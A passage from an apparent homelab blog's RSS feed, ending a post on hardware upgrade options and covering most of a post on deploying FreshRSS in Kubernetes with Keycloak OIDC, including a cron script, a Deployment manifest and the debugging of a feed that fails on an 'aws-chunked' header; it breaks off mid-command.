time when I was running VMs on my old home server while doing the k8s migration.</p>
<p>The costs are a bit unclear, from some quick searching I would need to do a lot
more thinking and research to see what I can get for which price. I&rsquo;m also a bit
worried about both, the power consumption and the noise levels. I will likely ask
around a bit on the Fediverse and see what other Homelabbers have to say on those
topics.</p>
<p>One big question with this option would be whether I would keep my three Pi 5
boards, which currently serve as k8s control plane nodes and run the Ceph MONs.
I could put one on each of the SFF PCs in a separate VM, for example.</p>
<h2 id="conclusions">Conclusions</h2>
<p>&#x1f937; I&rsquo;m honestly unsure at the moment. While I don&rsquo;t want to spend insane
amounts of money, the above cost estimates fall rather comfortably into the
&ldquo;eh, I can live with that&rdquo; bracket.</p>
<p>I don&rsquo;t think I will ultimately end up with option 1. Especially while playing
around with <a href="https://tinkerbell.org/">Tinkerbell</a>, I again got a bit annoyed
with the idiosyncrasies of ARM SBCs. I really want something conforming to
established standards for the next hardware iteration.</p>
<p>Option 2 would feel to me a bit too much like putting too many eggs into too
few baskets. I&rsquo;d gotten quite used to having my storage on separate hosts.
But then again, looking at the CPU utilization of those hosts, I&rsquo;m wasting a lot
of compute by not running more things on them.</p>
<p>Option 3 is my current favorite, to be honest. I&rsquo;d love introducing something new
into the Homelab with Incus. Plus it would definitely introduce some interesting
challenges when it comes to my automated Homelab host OS update Ansible playbook.
&#x1f601;</p>
<p>We shall see. For now, the current Homelab is still fine. Plus, I&rsquo;m also planning
a networking upgrade that will likely happen first. But it was interesting to
think about, at least.</p>
]]></content:encoded>
    </item>
    <item>
      <title>FreshRSS: An RSS/Atom Feed Reader</title>
      <link>https://blog.mei-home.net/posts/freshrss/</link>
      <pubDate>Mon, 05 Jan 2026 22:15:49 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/freshrss/</guid>
      <description>I try Nextcloud News with RSSGuard as well as FreshRSS, ending on FreshRSS</description>
      <content:encoded><![CDATA[<p>Wherein I end up replacing my Brief setup for RSS with FreshRSS.</p>
<p>Over the holidays, I visited my family and only had my laptop with me. While I
have most things properly synced, my RSS feed subscriptions are not. Up to now,
I&rsquo;ve been using the <a href="https://addons.mozilla.org/de/firefox/addon/brief/">Brief Firefox extension</a>.
It looks like this:
<figure>
    <img loading="lazy" src="brief.png"
         alt="A screenshot of Brief&#39;s UI. On the left is the menu, with options for configuration, updating feeds and so on. Below that are menu entries for different views, showing all posts, only today&#39;s, bookmarked posts or trashed posts. Below that are all the blogs I&#39;m subscribed to, ranging from my own blog, over some corporate blogs like Turing Pi&#39;s to those of friends and acquaintances from the Fediverse. To the right of that menu are the current posts, divided into sections by publishing date. It&#39;s overall a very simple UI. The list of current posts only shows the headlines, no content."/> <figcaption>
            <p>Example of the Brief UI</p>
        </figcaption>
</figure>
</p>
<p>And it was fine. I really don&rsquo;t need much from an RSS reader. I don&rsquo;t tend to
read posts in my feed reader at all, it&rsquo;s really just an aggregator for me. When
the headline interests me, I read the article on the original page.</p>
<p>The big problem with Brief was the fact that occasionally, I would be on the road,
and hence away from my desktop. And I would not have all of my blogs around to
read. Which isn&rsquo;t <em>that</em> annoying from the perspective of not having the current
reading state of individual articles around. But rather the issue is that I also
didn&rsquo;t have my subscriptions synced on my desktop and laptop setups.</p>
<h2 id="nextcloud-news">Nextcloud News</h2>
<p>Writing a Fediverse post about my woes, <a href="https://transitory.social/@rachel">Rachel</a>
noted that Nextcloud has an RSS reader with <a href="https://apps.nextcloud.com/apps/news">Nextcloud News</a>,
which could safe me some setup compared to standalone solutions like <a href="https://miniflux.app">Miniflux</a>.</p>
<p>The install is pretty simple, but I hit a problem due to the way I&rsquo;m handling
Nextcloud&rsquo;s cron. As I&rsquo;ve noted in my <a href="https://blog.mei-home.net/posts/k8s-migration-19-nextcloud/">Nextcloud setup post</a>,
I&rsquo;m using the <a href="https://docs.nextcloud.com/server/stable/admin_manual/configuration_server/background_jobs_configuration.html#webcron">Webcron</a>
option, with a separate container which regularly hits the required endpoint and
triggers Nextcloud&rsquo;s background jobs. But this was a problem for the setup of
News. As per its docs, it cannot work with Webcron. That&rsquo;s because News has to
run the feed fetching via the cron setup, and remote content fetching can take
a while. So it&rsquo;s restricted to using a normal cron job. I took this chance to
finally dig deep enough into my setup to be able to use cron properly.</p>
<p>But before I did so, I had a look at the cron option <a href="https://github.com/nextcloud/news-updater">offered by the News app</a>.
It&rsquo;s a Python script which does the feed updates. I disregarded this option
because it seems to require a Nextcloud admin account.</p>
<p>Next, I looked at options to run Nextcloud&rsquo;s cron with a real cron job. This is
famously complicated in a containerized setup, but Nextcloud provides an example
in <a href="https://github.com/nextcloud/docker/blob/master/.examples/docker-compose/with-nginx-proxy/postgres/fpm/compose.yaml">their docker-compose</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">cron</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">nextcloud:fpm-alpine</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#ae81ff">always</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">nextcloud:/var/www/html:z</span>
</span></span><span style="display:flex;"><span>      <span style="color:#75715e"># NOTE: The `volumes` config of the `cron` and `app` containers must match</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">entrypoint</span>: <span style="color:#ae81ff">/cron.sh</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">db</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">redis</span>
</span></span></code></pre></div><p>Reproducing this setup in Nextcloud&rsquo;s Pod resulted in this error:</p>
<pre tabindex="0"><code>crond: can&#39;t set groups: Operation not permitted
</code></pre><p>So I&rsquo;d have to run the container with <code>root</code> permissions. Instead of doing that,
I decided to just re-write my original web cron script a little bit:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;</span><span style="color:#66d9ef">$(</span>date<span style="color:#66d9ef">)</span><span style="color:#e6db74">: Launched task, sleeping for </span><span style="color:#e6db74">${</span>INITIAL_WAIT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>sleep <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>INITIAL_WAIT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">while</span> true; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>  php -f /var/www/html/cron.php 2&gt;&amp;<span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;</span><span style="color:#66d9ef">$(</span>date<span style="color:#66d9ef">)</span><span style="color:#e6db74">: Sleeping for </span><span style="color:#e6db74">${</span>SLEEPTIME<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>  sleep <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>SLEEPTIME<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span>
</span></span></code></pre></div><p>That container then got all of the mounts and env variables of my main Nextcloud
container, and now I&rsquo;ve got Nextcloud&rsquo;s cron running via this cron job, instead
of Webcron.</p>
<p>The web interface looks like this:</p>
<figure>
    <img loading="lazy" src="weird-sorting-youtube-folder.png"
         alt="A screenshot of Nextcloud New&#39;s web UI. At the top are the typical Nextcloud main menu options, e.g. dashboard or files or photos. In the main area on the left is a menu. At the top is a large &#39;subscribe&#39; button for adding new feeds. Below it is a button for new folders. After that come the different views for feeds. At the top is one with all unread articles. Then one for all articles, followed by &#39;viewed last&#39; and then &#39;bookmarked&#39;. Then come my subscribed feeds, sorted by folders. The selected feed is the &#39;YouTube&#39; folder, showing 133 unread items. To the right of the menu is the main area, showing a list of articles. Or rather, in this particular case, YouTube videos. One important thing to note is that the list only contains the video&#39;s titles, but not which feed it is coming from. Another important thing is that videos are not sorted by publishing date, as videos published on October 24th are directly followed by videos from 6 days ago or yesterday. Those in turn are then followed by videos from November 17th and three weeks ago."/> <figcaption>
            <p>Example of the Nextcloud News UI.</p>
        </figcaption>
</figure>

<p>There are two things I didn&rsquo;t really like. One is that the feed an article is
coming from isn&rsquo;t shown in the list. That should not matter too much for most use
cases, because the favicon is still shown. But starting to use YouTube&rsquo;s RSS feeds
was one of the things I wanted to do, and of course all of those feeds would
just have YouTube&rsquo;s favicon.</p>
<p>Also note the order of the videos. They&rsquo;re not ordered purely by publishing date.
Instead, the order seems to be first by feed, and only then by publishing date.
Which for me ruins the usability of combined feeds like the YouTube folder here.
This is a <a href="https://github.com/nextcloud/news/issues/2626">known issue</a>, and seems
to be related to the architecture of the News app if I&rsquo;m reading the issue&rsquo;s
comments correctly.</p>
<p>At the same time, those two problems seemed to be only related to the UI. So I
decided to look around for a desktop client for RSS. I ultimately landed on
<a href="https://github.com/martinrotter/rssguard">RSSGuard</a>.</p>
<p>It works nicely with Nextcloud News and can properly sync feeds and the read/unread
state of articles. One thing I&rsquo;m not sure about whether it&rsquo;s me being a bit
incompetent, but it looked like adding feeds was not possible in RSSGuard, only
via the News web interface.</p>
<p>RSSGuard looks like this:</p>
<figure>
    <img loading="lazy" src="rss-guard.png"
         alt="A screenshot of RSSGuard. Its UI has a similar layout as Nextcloud News. On the left is a list of the feeds I&#39;m subscribed to, sorted into folders. They&#39;re arranged under my Nextcloud account, indicating that RSSGuard supports multiple feed aggregator accounts. On the right is the lift of articles. It shows the title, author and a date. In this case, the screenshot shows the Practical Engineering YouTube channel&#39;s recent videos. Arranged along the top are buttons for bookmarking an article, as well as marking it read/unread."/> <figcaption>
            <p>Example of RSSGuard</p>
        </figcaption>
</figure>

<p>I liked this interface a bit better than News&rsquo; web UI. The main issue here was
that I don&rsquo;t really like separate apps for things these days. For most things,
I&rsquo;d rather prefer a nice web interface.</p>
<p>In addition, I also realized another annoying thing about Nextcloud News. It seems
that it uses the &ldquo;Last updated&rdquo; date for article dates, not the published date.
This, too, I find pretty annoying. Take for example the topmost video in the
above screenshot. It&rsquo;s <a href="https://www.youtube.com/watch?v=3nDdLiXS5wk">this one</a>.
The date shown by both, Nextcloud News and RSSGuard, is 2025-12-24. But the
video was actually published on 2025-10-07. I looked around a lot, and couldn&rsquo;t
find an option to switch to always using the publishing date, not the date the
article was last updated.</p>
<p>This finally put me off Nextcloud News.</p>
<h2 id="freshrss">FreshRSS</h2>
<p>Looking at other options, I finally decided on <a href="https://freshrss.org/index.html">FreshRSS</a>.</p>
<p>It&rsquo;s written in PHP and supplies a container for deployments out of the
box. It also supports OIDC for SSO and works nicely with my Keycloak instance.
For data storage, it supports all the mainstream ones, including MySQL, PostgreSQL
and SQLite. As I&rsquo;m not foreseeing much load, I decided on staying with SQLite.
Besides the database, it also needs some space for stuff like cached favicons.</p>
<p>The container already comes with an Apache instance, so no further web server
for delivering static assets is required. The container also comes with a cron
daemon, so there&rsquo;s no need for setting up a separate process for triggering the
feed update.</p>
<p>The setup in my Kubernetes cluster was pretty straightforward, so I will only
provide the Deployment manifest here:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">freshrss</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">freshrss</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">freshrss</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">freshrss</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">freshrss/freshrss:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">freshrss</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/var/www/FreshRSS/data</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">subPath</span>: <span style="color:#ae81ff">data</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">freshrss</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/var/www/FreshRSS/extensions</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">subPath</span>: <span style="color:#ae81ff">extensions</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">500Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">TZ</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;Europe/Berlin&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CRON_MIN</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;2,32&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">LISTEN</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;0.0.0.0:8080&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FRESHRSS_ENV</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;production&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#75715e"># My main Traefik instance as well as my k8s Pod CIDR</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">TRUSTED_PROXY</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;10.1.1.1 10.2.0.0/16&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">OIDC_ENABLED</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">OIDC_PROVIDER_METADATA_URL</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;https://login.example.com/realms/example/.well-known/openid-configuration&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">OIDC_REMOTE_USER_CLAIM</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;preferred_username&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">OIDC_SCOPES</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;openid profile&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">OIDC_X_FORWARDED_HEADERS</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;X-Forwarded-Host X-Forwarded-Port X-Forwarded-Proto&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">OIDC_CLIENT_ID</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">oidc-secret</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">id</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">OIDC_CLIENT_SECRET</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">oidc-secret</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">secret</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">OIDC_CLIENT_CRYPTO_KEY</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">oidc-encrypt-key</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">secret</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">freshrss-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: <span style="color:#ae81ff">8080</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">freshrss</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">freshrss-volume</span>
</span></span></code></pre></div><p>Similar to what I wrote above on Nextcloud and cron, the FreshRSS container
needs to run as root, as it is running a cron daemon. The Apache instance drops
privileges and uses the <code>www-data</code> user with UID 33 though.</p>
<p>The <code>CRON_MIN</code> configuration configures the cronjob updating feeds to run
every 30 minutes, at hh:02 and hh:32.</p>
<p>Upon first visiting the FreshRSS URL, it will show a few setup pages for
configuring the initial user/admin account and the database. When using OIDC for
authentication, some care has to be taken: The username for the new user needs
to be the same as the OIDC username. The relevant docs can be found <a href="https://freshrss.github.io/FreshRSS/en/admins/16_OpenID-Connect.html">here</a>.
The password provided on the page is not relevant, as it won&rsquo;t be used when
OIDC auth is enabled.</p>
<p>As Keycloak is not among the documented OIDC providers in the FreshRSS docs,
here is a short overview of the config which worked for me for configuring the
client in Keycloak:</p>
<ul>
<li><em>Root URL:</em> <a href="https://freshrss.example.com">https://freshrss.example.com</a></li>
<li><em>Home URL:</em> <a href="https://freshrss.example.com">https://freshrss.example.com</a></li>
<li><em>Valid Redirect URIs:</em> <a href="https://freshrss.example.com:443/i/oidc">https://freshrss.example.com:443/i/oidc</a>*
<ul>
<li>Weirdly enough, the port is necessary here, as the FreshRSS container does
provide the redirect URL exactly like this. Without the port, Keycloak will
reject the request</li>
</ul>
</li>
<li><em>Valid post logout redirect URIs:</em> <a href="https://freshrss.example.com/">https://freshrss.example.com/</a>*</li>
<li><em>Web origins:</em> <a href="https://freshrss.mei-home.net">https://freshrss.mei-home.net</a></li>
<li><em>Client Authentication:</em> On</li>
<li><em>Authorization:</em> Off</li>
<li><em>Standard Flow:</em> On</li>
<li>All other check boxes off</li>
</ul>
<h2 id="adding-feeds">Adding Feeds</h2>
<p>Once the install was complete, I could start adding feeds. This is what FreshRSS'
UI looks like:</p>
<figure>
    <img loading="lazy" src="freshrss-ui.png"
         alt="A screenshot of FreshRSS&#39; web UI. It is split into two parts, a menu with the feeds on the left, and the main area with the currently selected feeds on the right. At the top of the menu on the left is a big button for subscription management and adding feeds. Below it are several views of the available feeds. At the top is a &#39;Main stream&#39;, which shows ten unread articles via a number next to it. Below it are important feeds and favourited articles, both without content at the moment. Below is the &#39;Uncategorized&#39; category. It contains one feed, called &#39;FreshRSS releases&#39;, also showing 10 unread articles. This feed is currently selected. At the top of the main area on the right are some buttons. The first two allow switching between showing unread or already read articles. Next come two buttons for showing favourited or un-favourited articles. Then comes a button for choosing configurable user-quieries. Next is a dropdown menu with some actions for the whole feed: Marking all articles as read, and marking articles older than one day or older than one week as read. Finally , there are buttons for changing the main view to a more or less detailed view. And finally, there&#39;s a button for manually triggering an update for the specific feed. The main area contains the list of articles. At the top of the list is a line saying &#39;Received today -- 4 January 2026&#39;. Each line first contains a button to mark the article as read/unread and the another one for favouriting the article. Next comes the name of the feed, which is also a link for opening that feed in FreshRSS. Next comes the article&#39;s headline. In this case, it&#39;s the subject line of the GitHub release, e.g. &#39;FreshRSS 1.26.2&#39;. Finally follows the publishing date of the article and a button to open the article on the original page. Below the list of articles is a short note that there are no more articles, followed by a very big button which will mark all articles as read and jump to the next unread sibling feed."/> <figcaption>
            <p>Example of the brief UI right after finishing the setup.</p>
        </figcaption>
</figure>

<p>The &ldquo;FreshRSS releases&rdquo; is a GitHub releases RSS feed for FreshRSS which is added
by default for all new users.</p>
<p>Note the &ldquo;Received today &ndash; 4 January 2026&rdquo; line at the top. I don&rsquo;t really like
this, as I don&rsquo;t really care when an article was fetched, but rather when it was
published. This can be changed via dropdown:</p>
<figure>
    <img loading="lazy" src="freshrss-sorted-publishing.png"
         alt="The same view as before. But now, the menu for setting up the view is expanded at the top, showing a number of options for changing how the article list is shown. It allows sorting by a number of characteristics, e.g. by publication date, user modified date, content length, lexically by the full link, by title, by the feed&#39;s title, and even in random order. The publication date option is selected in the screenshot. The effect on the article list is that now, instead of just one headline saying &#39;Received today -- 4 January 2026&#39;, there is now one headline for every day with a release. E.g. there&#39;s now a headline &#39;Published -- 3 June 2025&#39;, with the article for the FreshRSS 1.26.3 release below it."/> <figcaption>
            <p>Switching to sorting the posts by publication date.</p>
        </figcaption>
</figure>

<p>Addition of a new feed works through the &ldquo;+&rdquo; at the top of the menu. It leads
to this form:
<figure>
    <img loading="lazy" src="freshrss-add-feed.png"
         alt="A screenshot of FreshRSS&#39; subscription management UI. On the left is a menu again, providing access to Subscription management, label management, import/export of data as well as some statistics. It also has a menu item called &#39;Add a feed or category&#39;, which is currently selected. In the main area on the right are multiple forms. The first one is headed &#39;Add a category&#39;, which contains a single field labeled &#39;category&#39; and a button labeled &#39;Add&#39; below it. Next comes the &#39;Add a feed&#39; form. IT has a field labeled &#39;Feed URL&#39;. Then comes a dropdown to chose the category the new feed should be sorted into. That&#39;s followed by two hidden sections with additional config options, labeled &#39;Type of feed source&#39; and &#39;Advanced&#39;. Below that is another &#39;Add&#39; button. Finally, there is the &#39;Add dynamic OPML&#39; form. It has two fields, the first one labeled &#39;OPML category name&#39; and second one called &#39;OPML URL&#39;. That&#39;s again followed by an &#39;Add&#39; button."/> <figcaption>
            <p>The feed and category addition UI.</p>
        </figcaption>
</figure>
</p>
<p>In the &lsquo;Add a feed&rsquo; form, the &lsquo;Feed URL&rsquo; doesn&rsquo;t need to be the full URL of the
feed&rsquo;s XML file. FreshRSS can scan for the typical RSS links. E.g. when adding
my blogs home page into the field, it doesn&rsquo;t have any problem finding the
correct RSS URL at <a href="https://blog.mei-home.net/index.xml">https://blog.mei-home.net/index.xml</a>.</p>
<p>The &ldquo;Type of feed source&rdquo; section contains additional options, which allow for
scraping a website which doesn&rsquo;t provide an RSS feed and adding that to FreshRSS,
but I haven&rsquo;t tried that myself.</p>
<p>The &ldquo;Advanced&rdquo; section contains additional options, like setting additional
headers to be send while fetching the feed or setting credentials for auth.</p>
<p>I don&rsquo;t want to make this post any longer than it is already going to be, so I
will provide all the sites I subscribe to in a follow-up. But I wanted to note
two things. First, GitHub provides RSS feeds on the release pages of projects,
as the FreshRSS feed already demonstrates.
And I&rsquo;m also using YouTube&rsquo;s feeds. They provide an RSS feed per channel, and
I&rsquo;m now using that instead of YouTube&rsquo;s subscriptions page. The one thing I&rsquo;m
missing are the video durations. E.g. when cooking, I like to put on a longer
video to listen to. But I can&rsquo;t see the durations in FreshRSS, as they&rsquo;re not
provided as part of the RSS feeds.
Another annoying thing is that the feeds cannot be filtered to only proper videos.
You also get the shorts when subscribing to a channel. This annoys me a bit,
but luckily most of the channels I&rsquo;m following don&rsquo;t do a lot of shorts. I&rsquo;m
also going to have a look at FreshRSS&rsquo; filtering functionality. I&rsquo;m pretty sure
that it should be possible to filter the shorts via that feature.</p>
<h2 id="open-sourcery">Open Sourcery</h2>
<p>While working on setting up FreshRSS, I was again reminded why I love Open Source.
One of the blogs I read wasn&rsquo;t getting added to FreshRSS. When trying to add it,
I was getting this error in the logs:</p>
<pre tabindex="0"><code>A feed could not be found at `https://blog.example.com/index.xml`; the status code is `200` and content-type is `` [https://blog.example.com/index.xml]
</code></pre><p>That was pretty weird, for two reasons: One, Brief didn&rsquo;t have any issues adding
this blog and handled it perfectly fine. And two, the blog is set up very similar
to mine - running Hugo, even with the same theme, and backed by a Ceph S3 bucket,
fronted by a Traefik instance. Even the Traefik setups are pretty similar. And
yet, my blog worked fine in FreshRSS, and the other blog also worked fine in Brief.</p>
<p>The next thing I tried was appending <code>#force_feed</code> to the feed URL, as proposed
in some FreshRSS issues for cases where the feed wasn&rsquo;t getting added properly.
That resulted in an error again, but this time with a different message:</p>
<pre tabindex="0"><code>A feed could not be found at `https://blog.example.com/index.xml`. Empty body. [https://blog.example.com/index.xml#force_feed]
</code></pre><p>Empty body? I went ahead and curl&rsquo;ed the <code>index.xml</code>. It worked perfectly fine,
no complaints. The content also looked fine. I verified that with the
<a href="https://validator.w3.org/feed/">W3C Feed Validator</a>, and while it showed a few
warnings, it didn&rsquo;t have any major issues with the feed either.</p>
<p>Checking the cURL output a few more times, I started comparing it to the output
for my blog - as I said, our setups are pretty similar. And I finally found the
one major difference: The blog which wasn&rsquo;t working in FreshRSS was sending
a <code>Content-Encoding: aws-chunked</code> header, while mine wasn&rsquo;t. And looking at that
header&rsquo;s <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Content-Encoding">docs</a>,
it seemed to be intended to indicate the compression algorithm used. And <code>aws-chunked</code>
wasn&rsquo;t among the normal values allowed for that header.</p>
<p>I assumed that the issue was somehow related to the fact that the blog was delivered
from a Ceph S3 bucket, but wasn&rsquo;t able to figure out anything more. But I did
wonder why curl&rsquo;ing on the command line worked without issue, but FreshRSS had
problems. And here is why I love Open Source software: Instead of only being able to file
an issue with the project, I was able to check what&rsquo;s wrong myself.</p>
<p>FreshRSS has good <a href="https://freshrss.github.io/FreshRSS/en/developers/02_First_steps.html">developer documentation</a>.
I cloned the repository, and then launched a test instance like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>podman run --rm<span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  -p 8080:80<span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  -e FRESHRSS_ENV<span style="color:#f92672">=</span>development<span style="color:#ae81ff">\
